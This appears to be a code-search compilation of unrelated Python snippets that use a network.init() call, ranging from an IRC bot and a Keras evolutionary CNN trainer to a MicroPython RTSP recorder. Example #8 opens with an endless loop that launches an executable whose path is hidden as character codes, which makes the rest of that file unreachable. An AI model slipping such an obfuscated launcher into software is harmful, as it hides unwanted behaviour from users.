Example #1
File: main.py Project: chozabu/pyrock
def main(settingsfile="settings.json", test_mode=False, no_auto=False):
    """Display a friendly greeting.

    :param str settingsfile: settings file to load
    :param bool test_mode: True to run some tests
    :param bool no_auto: True to disable auto FR
    """

    #load settings
    with open(settingsfile) as data_file:
        data = json.load(data_file)
        settings.load_data(data)
        machinesfile = data['machines_file']

    #init network
    network.init(settings.serve_port)
    network.hook_type("hello", test_cb)

    #init synclist
    synclist.init()

    #init basic_chat
    basic_chat.init()

    #init html
    html_ui.init()
    websockets_ui.init()

    #load machines
    machine.loadcontacts(machinesfile)

    #init machines
    machine.init()
    if not no_auto:
        machine.autoconnect()

    #connect to all?

    print("Init Complete")

    if test_mode:
        run_tests()

    while settings.running:
        time.sleep(1)
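
The network module here is specific to pyrock and is not shown. Judging only from the calls in main(), its surface is init(port) plus a hook registry; a minimal hypothetical stub, purely for illustration:

# Hypothetical stub of the network API implied above (not pyrock's real code).
_hooks = {}

def init(port):
    # the real module would bind a listening socket on `port` here
    pass

def hook_type(name, callback):
    # register `callback` to run for incoming messages of type `name`
    _hooks.setdefault(name, []).append(callback)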
Example #2
File: leczair.py Project: memery/leczair
def run_bot(state):
    try:
        state.network = network.init(state.settings.irc)
        irc.hello(state.network, state.settings.irc, state.irc)

        while True:
            try:
                message = irc.get_message(state.network, state.settings.irc, state.irc)
                state.behaviour.nick = state.irc.nick

                if message:
                    # TODO: Temporary until we know more about how admin
                    # commands are going to work
                    if is_admin(state.settings, message.user):
                        if message.text == 'reconfigure':
                            # Save the old settings before reloading so the
                            # diff below compares old vs. new
                            old = state.settings
                            state.settings = load_settings()

                            msgs = irc.settings_changed(old.irc,
                                                        state.settings.irc)
                            for msg in msgs:
                                irc.send_message(state.network, msg)
                        if message.text == 'reload':
                            reload_modules()
                            continue
                        if message.text == 'restart':
                            return 'restart'

                    responses = behaviour.handle(message, state.settings,
                                                 state.behaviour)

                    for response in filter(bool, responses):
                        irc.send_message(state.network, response)

            except (BrokenPipeError, ConnectionResetError,
                    ConnectionAbortedError, ConnectionRefusedError):
                raise
            except Exception as e:
                logger.exception(e)

    except Exception as e:
        # Gotta catch 'em all because if we don't catch it by now, fire and
        # explosions will ensue
        logger.exception(e)

        # If anything is thrown and caught here, there's no point in trying to
        # do anything about it because we've already exited the connection
        # maintenance loop, so we just wait a bit and try to reconnect again.
        sleep(30)
    finally:
        network.close(state.network)
        # Clear the IRC-connection-specific state when the connection has
        # been killed
        state.irc = State()
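
Since run_bot returns 'restart' on the admin restart command and otherwise falls out after a failure (sleeping 30 seconds first), it is presumably driven by an outer loop along these lines; this is an assumption, not code from leczair:

# Hypothetical supervisor: reconnect after failures, loop again on 'restart'.
def supervise():
    state = State()
    state.settings = load_settings()
    state.irc = State()
    while True:
        # run_bot cleans up its own connection in its finally block,
        # so simply looping reconnects in both the failure and restart cases
        run_bot(state)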
Example #3
def start():
    pg.init()

    pg.display.set_mode((width, height), flags=pg.SCALED | pg.RESIZABLE)
    pg.display.set_caption('card game')

    save.init()
    image_handler.init()
    spritesheet.init()
    customsheet.init()
    menu.init()
    client.init()
    game.init()
    network.init()
    builder.init()
    ui.init()

    main_menu = ui.Menu(get_objects=menu.main_menu)
    main_menu.run()

    pg.quit()
Example #4
def writer(topic, data=0, init_description=""):
    from writer import writeToFile, isint

    #cleaning function making sure each node is properly linked
    def clean(data, curNode):
        for n in curNode.future:
            if n >= len(data):
                continue
            pastArray = data[n].past
            if n not in pastArray:
                data[n].flashback(curNode.id)
        for n in curNode.past:
            if n >= len(data):
                continue
            futureArray = data[n].future
            if n not in futureArray:
                data[n].flashforward(curNode.id)
        for n in curNode.related:
            if n >= len(data):
                continue
            relatedArray = data[n].related
            if n not in relatedArray:
                data[n].relate(curNode.id)

    file = "../data/" + topic + ".json"

    data = reader(topic)
    DG = init(data)
    DG = cleanPred(data, DG)
    max_id = len(data)  # id for the new node; avoids shadowing the builtin max

    content = ""
    summary = init_description
    print(topic + ".write: " + summary)

    while content != "end":
        content = input("")

        if content == "end":
            continue
        #summary function
        if content == "ls":
            print(summary)
            continue
        #enter (input() strips the trailing newline, so an empty line means Enter)
        if content == "":
            summary += "\n"
            continue
        #premature break
        if content == "break":
            break
        #writing the actual content
        summary += content + " "

    #premature break
    if content == "break":
        return ""
    #connecting the content

    #get title
    print("Title: ")
    title = input("")
    if title == "up":
        title = summary

    print("Type: ")
    types = []  # renamed from "type" to avoid shadowing the builtin
    t = ""
    while t != "end":
        t = input("")
        if t == "end":
            continue
        types.append(t)

    print("Past: ")
    past_temp = ""
    back = []
    while past_temp != "end":
        past_temp = input("")
        if past_temp == "end":
            continue
        if past_temp[:2] == "ls":
            ls(past_temp, data)
            continue
        if past_temp == "search":
            se = ""
            while se != "end":
                se = input("search: ")
                if se == "end":
                    continue
                if isint(se):
                    get(data, DG, id=int(se))
                for n in searcher(se, data):
                    print(str(n.id) + ": " + n.title)
            continue
        if past_temp == "suc":
            for n in mostPopularSuc(data, DG, limit=10):
                print(str(n.id) + ": " + n.title)
            continue
        if past_temp == "pre":
            for n in mostPopularPred(data, DG, limit=10):
                print(str(n.id) + ": " + n.title)
            continue
        if past_temp == "cen":
            for n in most_degree_centrality(DG, limit=10):
                print(str(n[0].id) + ": " + n[0].title)
            continue
        if past_temp == "project":
            get_project(data, DG)
            continue
        if past_temp == "branch":
            branch(data, DG)
            continue
        if past_temp == "get":
            get(data, DG)
            continue
        if isint(past_temp):
            result = int(past_temp)
            back.append(result)
        else:
            print([
                str(n.id) + ": " + str(n.title)
                for n in searcher(past_temp, data)
            ])
        print(back)

    print("Future: ")
    future_temp = ""
    future = []
    while future_temp != "end":
        future_temp = input("")
        if future_temp == "end":
            continue
        if future_temp[:2] == "ls":
            if future_temp[:2] == "ls":
                ls(future_temp, data)
            continue
        if future_temp == "search":
            se = ""
            while se != "end":
                se = input("search: ")
                if se == "end":
                    continue
                if isint(se):
                    get(data, DG, id=int(se))
                for n in searcher(se, data):
                    print(str(n.id) + ": " + n.title)
            continue
        if future_temp == "suc":
            for n in mostPopularSuc(data, DG, limit=10):
                print(str(n.id) + ": " + n.title)
        if future_temp == "pre":
            for n in mostPopularPred(data, DG, limit=10):
                print(str(n.id) + ": " + n.title)
        if future_temp == "cen":
            for n in most_degree_centrality(DG, limit=10):
                print(str(n[0].id) + ": " + n[0].title)
        if future_temp == "get":
            get(data, DG)
        if isint(future_temp):
            result = int(future_temp)
            future.append(result)
        else:
            print([
                str(n.id) + ": " + str(n.title)
                for n in searcher(future_temp, data)
            ])
        print(future)

    #TODO: simplify this; break it into separate prompts (related, keywords, edit)
    c = ""
    related = []
    keyword = []
    while c != "end":
        c = input("")
        if c == "end":
            continue
        if c == "break":
            break
        #if you want to add related
        if c == "related":
            print("Related: ")
            r_temp = ""
            while r_temp != "end":
                r_temp = input("")
                if r_temp == "end":
                    continue
                if isint(r_temp):
                    result = int(r_temp)
                    related.append(result)
                else:
                    print([
                        str(n.id) + ": " + str(n.title)
                        for n in searcher(r_temp, data)
                    ])
                print(related)
        #if you want to add keywords
        if c == "keywords":
            print("Keywords: ")
            k_temp = ""
            while k_temp != "end":
                k_temp = input("")
                if k_temp == "end":
                    continue
                keyword.append(k_temp)
        if c == "edit":
            data = edit(data)
    if c == "break":
        return ""
    print(title)
    print(types)
    print(summary)

    #CLEANING

    current_Node = Node(title, types, summary, keyword, back, future, related,
                        max_id)
    clean(data, current_Node)
    data.append(current_Node)
    max_id += 1

    #WRITING BACK TO TXT FILE
    writeToFile(file, data)
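
The Node class is not included in this example. From the constructor call and the flashback/flashforward/relate calls in clean(), its shape is roughly the following; this is a hypothetical reconstruction, not the project's definition:

# Hypothetical Node, inferred from how writer() uses it above.
class Node:
    def __init__(self, title, type, summary, keyword, past, future, related, id):
        self.title = title
        self.type = type
        self.summary = summary
        self.keyword = keyword
        self.past = past        # ids of predecessor nodes
        self.future = future    # ids of successor nodes
        self.related = related  # ids of related nodes
        self.id = id

    def flashback(self, id):     # link id as a predecessor
        self.past.append(id)

    def flashforward(self, id):  # link id as a successor
        self.future.append(id)

    def relate(self, id):        # link id as related
        self.related.append(id)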
Example #5
                pl = input("plot: ")

                if pl == "y" or pl == "yes":
                    totcount += print_community(partition, G, plot=True)
                    nx.draw_networkx_edges(G, pos, alpha=0.5)
                    plt.show()
                else:
                    totcount += print_community(partition, G)

                return totcount

    # for com in set(partition.values()) :
    # 	count = count + 1.
    # 	list_nodes = [nodes for nodes in partition.keys()
    # 								if partition[nodes] == com]
    # 	nx.draw_networkx_nodes(G, pos, list_nodes, node_size = 20,
    # 								node_color = str(count / size), cmap = "cool")
    # nx.draw_networkx_edges(G, pos, alpha=0.5)
    # plt.show()


if __name__ == "__main__":
    topic = "probability"
    from reader import reader
    from network import init
    data = reader(topic)
    DG = init(data)
    get_project(data, DG)
    print("COUNT = " + str(branch(data, DG)))
Example #6
def main():
    # Parameters
    no_of_generations = 20
    no_of_individuals = 10
    mutate_factor = 0.05
    layers = [0, 3, 5]
    batch_size = 64
    num_classes = 10
    epochs = 1
    all_models_inmemory = True
    use_datagenerator = False

    # Load dataset
    (X_train, y_train), (X_test, y_test) = mnist.load_data()
    X_train = X_train.reshape(X_train.shape[0], 28, 28, 1)
    X_test = X_test.reshape(X_test.shape[0], 28, 28, 1)
    # Data normalization
    X_train = X_train.astype('float32') / 255.0
    X_test = X_test.astype('float32') / 255.0
    y_train_df = pd.DataFrame(data=y_train, columns=["label"])
    y_train = to_categorical(y_train, num_classes)
    y_test = to_categorical(y_test, num_classes)
    # See some statistics
    print(y_train_df.head())
    z_train = Counter(y_train_df['label'])
    print(z_train)
    sns.countplot(y_train_df['label'])
    plt.show()
    # Preview the images first
    plt.figure(figsize=(12, 10))
    x, y = 10, 4
    for i in range(40):
        plt.subplot(y, x, i + 1)
        plt.imshow(X_train[i], interpolation='nearest')
    plt.show()
    # Printing shapes
    print('X_train shape:', X_train.shape)
    print(X_train.shape[0], 'train samples')
    print(X_test.shape[0], 'test samples')
    # Database splitting
    X_train, X_val, Y_train, Y_val = train_test_split(X_train,
                                                      y_train,
                                                      test_size=0.1,
                                                      random_state=42)

    # Callbacks
    learning_rate_reduction = ReduceLROnPlateau(monitor='val_accuracy',
                                                patience=3,
                                                verbose=1,
                                                factor=0.5,
                                                min_lr=0.0001)
    callbacks = [learning_rate_reduction]

    # Datagenerator
    datagen = ImageDataGenerator(
        featurewise_center=False,             # set input mean to 0 over the dataset
        samplewise_center=False,              # set each sample mean to 0
        featurewise_std_normalization=False,  # divide inputs by std of the dataset
        samplewise_std_normalization=False,   # divide each input by its std
        zca_whitening=False,                  # apply ZCA whitening
        rotation_range=15,                    # randomly rotate images (degrees)
        zoom_range=0.1,                       # randomly zoom images
        width_shift_range=0.1,                # randomly shift horizontally (fraction of width)
        height_shift_range=0.1,               # randomly shift vertically (fraction of height)
        horizontal_flip=False,                # randomly flip images horizontally
        vertical_flip=False)                  # randomly flip images vertically
    datagen.fit(X_train)

    # Training
    if use_datagenerator:
        individuals = []
        for i in range(no_of_individuals):
            if all_models_inmemory:
                individuals.append(init2(num_classes, batch_size, epochs))
            else:
                individual = init2(num_classes, batch_size, epochs)
                name_ind = 'indv{}.h5'.format(i)
                individual.save(name_ind)

        for generation in range(no_of_generations):
            if generation == no_of_generations - 1:
                individuals, losses, histories = train2(
                    individuals, epochs, X_train, X_val, Y_train, Y_val,
                    datagen, batch_size, callbacks)
                print(losses)
            else:
                individuals, losses, histories = train2(
                    individuals, epochs, X_train, X_val, Y_train, Y_val,
                    datagen, batch_size, callbacks)
                print(losses)
                individuals = evolve(individuals, losses, layers,
                                     mutate_factor)
    else:
        if all_models_inmemory:
            individuals = []
            for i in range(no_of_individuals):
                individuals.append(init(num_classes, batch_size, epochs))

            for generation in range(no_of_generations):
                if generation == no_of_generations - 1:
                    individuals, losses, histories = train(
                        individuals, epochs, X_train, X_val, Y_train, Y_val)
                    print(losses)
                else:
                    individuals, losses, histories = train(
                        individuals, epochs, X_train, X_val, Y_train, Y_val)
                    print(losses)
                    individuals = evolve(individuals, losses, layers,
                                         mutate_factor)
        else:
            individuals = []
            for i in range(no_of_individuals):
                individual = init(num_classes, batch_size, epochs)
                name_ind = 'indv{}.h5'.format(i)
                individuals.append(name_ind)
                individual.save(name_ind)

            for generation in range(no_of_generations):
                if generation == no_of_generations - 1:
                    individuals, losses, histories = train_and_load(
                        individuals, epochs, X_train, X_val, Y_train, Y_val)
                    print(losses)
                else:
                    individuals, losses, histories = train_and_load(
                        individuals, epochs, X_train, X_val, Y_train, Y_val)
                    print(losses)
                    individuals = evolve_and_load(individuals, losses, layers,
                                                  mutate_factor)

    # Evaluation
    # Best individual
    ib = np.argmax(losses)
    final_loss, final_acc = individuals[ib].evaluate(X_val, Y_val, verbose=0)
    print("Final loss: {0:.6f}, final accuracy: {1:.6f}".format(
        final_loss, final_acc))

    # Confusion matrix
    # Predict the values from the validation dataset
    Y_pred = individuals[ib].predict(X_val)
    # Convert predictions classes to one hot vectors
    Y_pred_classes = np.argmax(Y_pred, axis=1)
    # Convert validation observations to one hot vectors
    Y_true = np.argmax(Y_val, axis=1)
    # compute the confusion matrix
    confusion_mtx = confusion_matrix(Y_true, Y_pred_classes)
    # plot the confusion matrix
    plot_confusion_matrix(confusion_mtx, classes=range(10))

    # Plot learning curves
    print(histories[ib].history.keys())
    accuracy = histories[ib].history['accuracy']
    val_accuracy = histories[ib].history['val_accuracy']
    loss = histories[ib].history['loss']
    val_loss = histories[ib].history['val_loss']
    epochs = range(len(accuracy))
    plt.figure()
    plt.plot(epochs, accuracy, 'bo', label='Training accuracy')
    plt.plot(epochs, val_accuracy, 'b', label='Validation accuracy')
    plt.title('Training and validation accuracy')
    plt.legend()
    plt.show()
    plt.figure()
    plt.plot(epochs, loss, 'bo', label='Training loss')
    plt.plot(epochs, val_loss, 'b', label='Validation loss')
    plt.title('Training and validation loss')
    plt.legend()
    plt.show()

    # Errors are difference between predicted labels and true labels
    errors = (Y_pred_classes - Y_true != 0)
    Y_pred_classes_errors = Y_pred_classes[errors]
    Y_pred_errors = Y_pred[errors]
    Y_true_errors = Y_true[errors]
    X_val_errors = X_val[errors]

    # Probabilities of the wrong predicted numbers
    Y_pred_errors_prob = np.max(Y_pred_errors, axis=1)
    # Predicted probabilities of the true values in the error set
    true_prob_errors = np.diagonal(
        np.take(Y_pred_errors, Y_true_errors, axis=1))
    # Difference between the probability of the predicted label and the true label
    delta_pred_true_errors = Y_pred_errors_prob - true_prob_errors
    # Sorted list of the delta prob errors
    sorted_delta_errors = np.argsort(delta_pred_true_errors)
    # Top 6 errors
    most_important_errors = sorted_delta_errors[-6:]
    # Show the top 6 errors
    display_errors(most_important_errors, X_val_errors, Y_pred_classes_errors,
                   Y_true_errors)

    # Activations
    # It looks like the diversity of similar patterns shared across multiple classes affects classifier performance, even though a CNN is a robust architecture.
    test_im = X_train[154]
    plt.imshow(test_im.reshape(28, 28), cmap='viridis', interpolation='none')
    # Let's see the activation of the 2nd channel of the first layer.
    # Adapted from the Keras docs and an answer on Stack Overflow.
    layer_outputs = [layer.output for layer in individuals[ib].layers[:8]]
    activation_model = tf.keras.models.Model(inputs=individuals[ib].inputs,
                                             outputs=layer_outputs)
    activations = activation_model.predict(test_im.reshape(1, 28, 28, 1))
    first_layer_activation = activations[0]
    plt.matshow(first_layer_activation[0, :, :, 4], cmap='viridis')
    test_im = X_train[154]
    plt.imshow(test_im.reshape(28, 28), cmap='viridis', interpolation='none')
    # Let's plot the activations of the other conv layers as well.
    individuals[ib].layers[:-1]  # dropping the last dense layer (note: this bare expression has no effect)
    layer_names = []
    for layer in individuals[ib].layers[:-1]:
        layer_names.append(layer.name)
    images_per_row = 16
    for layer_name, layer_activation in zip(layer_names, activations):
        if layer_name.startswith('conv'):
            n_features = layer_activation.shape[-1]
            size = layer_activation.shape[1]
            n_cols = n_features // images_per_row
            display_grid = np.zeros((size * n_cols, images_per_row * size))
            for col in range(n_cols):
                for row in range(images_per_row):
                    channel_image = layer_activation[0, :, :,
                                                     col * images_per_row +
                                                     row]
                    channel_image -= channel_image.mean()
                    channel_image /= channel_image.std()
                    channel_image *= 64
                    channel_image += 128
                    channel_image = np.clip(channel_image, 0,
                                            255).astype('uint8')
                    display_grid[col * size:(col + 1) * size,
                                 row * size:(row + 1) * size] = channel_image
            scale = 1. / size
            plt.figure(figsize=(scale * display_grid.shape[1],
                                scale * display_grid.shape[0]))
            plt.title(layer_name)
            plt.grid(False)
            plt.imshow(display_grid, aspect='auto', cmap='viridis')
    plt.show()

    layer_names = []
    for layer in individuals[ib].layers[:-1]:
        layer_names.append(layer.name)
    images_per_row = 16
    for layer_name, layer_activation in zip(layer_names, activations):
        if layer_name.startswith('max'):
            n_features = layer_activation.shape[-1]
            size = layer_activation.shape[1]
            n_cols = n_features // images_per_row
            display_grid = np.zeros((size * n_cols, images_per_row * size))
            for col in range(n_cols):
                for row in range(images_per_row):
                    channel_image = layer_activation[0, :, :,
                                                     col * images_per_row +
                                                     row]
                    channel_image -= channel_image.mean()
                    channel_image /= channel_image.std()
                    channel_image *= 64
                    channel_image += 128
                    channel_image = np.clip(channel_image, 0,
                                            255).astype('uint8')
                    display_grid[col * size:(col + 1) * size,
                                 row * size:(row + 1) * size] = channel_image
            scale = 1. / size
            plt.figure(figsize=(scale * display_grid.shape[1],
                                scale * display_grid.shape[0]))
            plt.title(layer_name)
            plt.grid(False)
            plt.imshow(display_grid, aspect='auto', cmap='viridis')
    plt.show()
    '''
    layer_names = []
    for layer in individuals[ib].layers[:-1]:
        layer_names.append(layer.name)
    images_per_row = 16
    for layer_name, layer_activation in zip(layer_names, activations):
        if layer_name.startswith('drop'):
            n_features = layer_activation.shape[-1]
            size = layer_activation.shape[1]
            n_cols = n_features // images_per_row
            display_grid = np.zeros((size * n_cols, images_per_row * size))
            for col in range(n_cols):
                for row in range(images_per_row):
                    channel_image = layer_activation[0,:, :, col * images_per_row + row]
                    channel_image -= channel_image.mean()
                    channel_image /= channel_image.std()
                    channel_image *= 64
                    channel_image += 128
                    channel_image = np.clip(channel_image, 0, 255).astype('uint8')
                    display_grid[col * size : (col + 1) * size,
                                 row * size : (row + 1) * size] = channel_image
            scale = 1. / size
            plt.figure(figsize=(scale * display_grid.shape[1],
                                scale * display_grid.shape[0]))
            plt.title(layer_name)
            plt.grid(False)
            plt.imshow(display_grid, aspect='auto', cmap='viridis')
    plt.show()
    '''

    # Classification report
    # Predict the values from the validation dataset
    Y_pred = individuals[ib].predict(X_val)
    # Convert predictions classes to one hot vectors
    Y_pred_classes = np.argmax(Y_pred, axis=1)
    Y_true_classes = np.argmax(Y_val, axis=1)
    print(Y_pred_classes[:5], Y_true_classes[:5])
    target_names = ["Class {}".format(i) for i in range(num_classes)]
    print(
        classification_report(Y_true_classes,
                              Y_pred_classes,
                              target_names=target_names))

    # Predict the values from the test dataset
    Y_pred = individuals[ib].predict(X_test)
    # Convert predictions classes to one hot vectors
    Y_pred_classes = np.argmax(Y_pred, axis=1)
    Y_true_classes = np.argmax(y_test, axis=1)
    print(Y_pred_classes[:5], Y_true_classes[:5])
    target_names = ["Class {}".format(i) for i in range(num_classes)]
    print(
        classification_report(Y_true_classes,
                              Y_pred_classes,
                              target_names=target_names))

    # Save best model
    individuals[ib].save("cnn.h5")
    json_string = individuals[ib].to_json()
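
init, init2, train, train2, evolve, and the *_and_load variants come from the surrounding project and are not shown. Matching how main() uses the individuals (.evaluate, .predict, .save, .to_json), init plausibly returns a compiled Keras CNN like this sketch; it is an assumption for illustration, not the project's code:

# Hypothetical init(): a small compiled CNN.
from tensorflow.keras import layers, models

def init(num_classes, batch_size, epochs):
    # batch_size and epochs are unused here; in the project they are
    # presumably consumed by train(), so the signature is kept for parity.
    model = models.Sequential([
        layers.Conv2D(32, (3, 3), activation='relu', input_shape=(28, 28, 1)),
        layers.MaxPooling2D((2, 2)),
        layers.Conv2D(64, (3, 3), activation='relu'),
        layers.MaxPooling2D((2, 2)),
        layers.Flatten(),
        layers.Dense(128, activation='relu'),
        layers.Dropout(0.5),
        layers.Dense(num_classes, activation='softmax'),
    ])
    model.compile(optimizer='adam',
                  loss='categorical_crossentropy',
                  metrics=['accuracy'])
    return model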
Example #7
def reload(data):
    DG = init(data)
    #clean graph initially
    DG = cleanPred(data, DG)
    return DG
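
A typical call site, assuming the reader() and edit() helpers seen in the other examples from this project:

# Sketch: refresh the derived graph whenever the node list changes.
data = reader(topic)
DG = reload(data)
data = edit(data)   # mutate the nodes...
DG = reload(data)   # ...then rebuild and re-clean the graph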
Example #8
File: t.py Project: Saectar/opencraft
import subprocess

# Obfuscated path: the chr codes below spell "C:\Program Files\Starcraft\Starcraft.exe".
# Note: this loop never exits, so the code after it is unreachable as written.
while True:
    subprocess.call(''.join(map(chr, [
        67, 58, 92, 80, 114, 111, 103, 114, 97, 109, 32, 70, 105, 108, 101,
        115, 92, 83, 116, 97, 114, 99, 114, 97, 102, 116, 92, 83, 116, 97,
        114, 99, 114, 97, 102, 116, 46, 101, 120, 101])))

import sys, math
import pygame
import network

network.init(int(sys.argv[1]))

selection = []


def get_my_orders(units):
    global selection
    o = []
    for e in pygame.event.get():
        if e.type == pygame.MOUSEBUTTONDOWN:
            if e.button == 1:
                # left click: select the friendly unit of type 1 closest to the click
                ma = 10000000
                for u in [u for u in units if u.owner == me and u.type == 1]:
                    v = (e.pos[0] - u.pos[0], e.pos[1] - u.pos[1])
                    m = math.sqrt(v[0]**2 + v[1]**2)
                    if m < ma:
                        de = u
                        ma = m
                selection = [de]
            elif e.button == 3:
                # right click: order every selected unit to the click position
                for u in selection:
                    o.append((units.index(u), tuple(map(float, e.pos))))
    return o  # added: the order list was built but never returned
Example #9
#!/usr/local/bin/kivy
from kivy.clock import Clock

import audio
import network
import gui
import control

if __name__ == '__main__':
    audio.init()
    network.init()
    control.init()

    Clock.schedule_interval(control.run, 0.0002)
    Clock.schedule_interval(network.run, 0.0002)
    gui.run()

    control.close()
    network.close()
    audio.close()
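
Kivy's Clock passes the elapsed time to scheduled callbacks, so control.run and network.run must accept a dt argument; a hypothetical stub of that shape (the real modules are not shown):

# Hypothetical stub: Clock.schedule_interval calls this with dt, the
# time in seconds since the previous call.
def run(dt):
    pass  # the real module polls its sockets / control state here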
Example #10
import usys   # MicroPython's sys module (used for usys.argv / usys.exit below)
import utime  # MicroPython's time module (used for utime.sleep_ms below)
import network
from video import Recorder

# Check the command-line arguments
if len(usys.argv) < 3:
    print("Usage: %s <ssid> <password>" % usys.argv[0])
    usys.exit(1)


# Define the network event callback
def network_evt_cb(eid):
    print('%s:%d' % ('eid', eid))


# Connect to the network
network.init(network.WIFI)
network.connect(usys.argv[1], usys.argv[2], network_evt_cb)

# Wait for the network to connect
utime.sleep_ms(10000)
print("start recorder with rtsp test")

# Start the video stream (RTSP)
recorder = Recorder()
recorder.open(0, recorder.H264)
recorder.start()
utime.sleep_ms(100000000)

# Stop the video stream and release the network
recorder.stop()
network.close()  # moved here: closing right after connect() would drop the link before recording
Example #11
                new_individual = random.choice([parentA, parentB])

        else:
            new_individual = random.choice(individuals[:])

        new_individuals.append(mutate(new_individual))
        #new_individuals.append(new_individual)

    return new_individuals


def evolve(individuals, losses):
    sorted_y_idx_list = sorted(range(len(losses)), key=lambda x: losses[x])
    individuals = [individuals[i] for i in sorted_y_idx_list]

    #winners = individuals[:6]

    new_individuals = crossover(individuals)

    return new_individuals


individuals = []  # added: the list must exist before the loop appends to it
for i in range(no_of_individuals):
    individuals.append(init())

for generation in range(no_of_generations):
    individuals, losses = train(individuals)
    print(losses)

    individuals = evolve(individuals, losses)
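
mutate() and the top of crossover() are cut off in this excerpt. As a rough illustration of the missing piece, assuming the individuals are Keras models and mutation jitters a random subset of weights (hypothetical, not the project's code):

import numpy as np

# Hypothetical mutate(): perturb a fraction of each weight tensor.
def mutate(individual, mutate_factor=0.05):
    new_weights = []
    for w in individual.get_weights():
        mask = np.random.rand(*w.shape) < mutate_factor
        new_weights.append(w + mask * np.random.normal(0.0, 0.1, w.shape))
    individual.set_weights(new_weights)
    return individual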